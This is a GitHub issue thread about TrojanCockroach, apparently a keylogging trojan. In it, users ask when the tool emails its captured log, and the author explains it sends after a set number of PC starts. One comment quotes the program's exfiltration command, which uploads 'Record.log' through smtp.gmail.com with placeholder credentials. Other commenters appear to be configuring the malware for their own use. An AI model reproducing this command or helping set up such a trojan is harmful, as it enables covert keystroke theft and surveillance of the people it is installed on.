### ISSUE TITLE
Characters until Email is sent

### ISSUE THREAD

**Issue by Lilantboy** [MinhasKamal/TrojanCockroach#4]
I was reviewing and studying the code, but I couldn't find the code that says how many characters or time it takes to send the email.

**Comment by MinhasKamal** [comment]
You are correct. In current code- sending mail does not depend on characters or time, rather on times-of-system-start.

You may, of course, modify the code as your need :)

**Comment by Lilantboy** [comment]
So when I start my system or reboot, it starts recording. Then the next time I start it, it will send the email ?

**Comment by MinhasKamal** [comment]
It records occurrence of PC starts, and after a [certain number](https://github.com/MinhasKamal/TrojanCockroach/blob/master/com/minhaskamal/trojanCockroach/TrojanCockroach.cpp#L23) of occurrences it send mail.

**Comment by rahman973** [comment]
i was actually code of TROJENCOCKROCH i found this line  
`<` char* command = "Transmit smtp://smtp.gmail.com:587 -v --mail-from \"your.email@gmail.com\" --mail-rcpt \"your.email@gmail.com\" --ssl -u your.email@gmail.com:password -T \"Record.log\" -k --anyauth"; `>`

is it your server address __**smtp.gmail.com:587_**_

if(yes== its yours)
{  "TELL ME HOW TO CREAT MY OWN **_SMTP_** SERVER" }
else
"inform me if its not ypur server address......and the sendded emails will pass tthrough your access"
break;

THANKS IN ADVANCE

**Comment by mastersuv** [comment]
It's gmail's smtp server, not his. Wtf man, you can use any other smtp service of your choice.
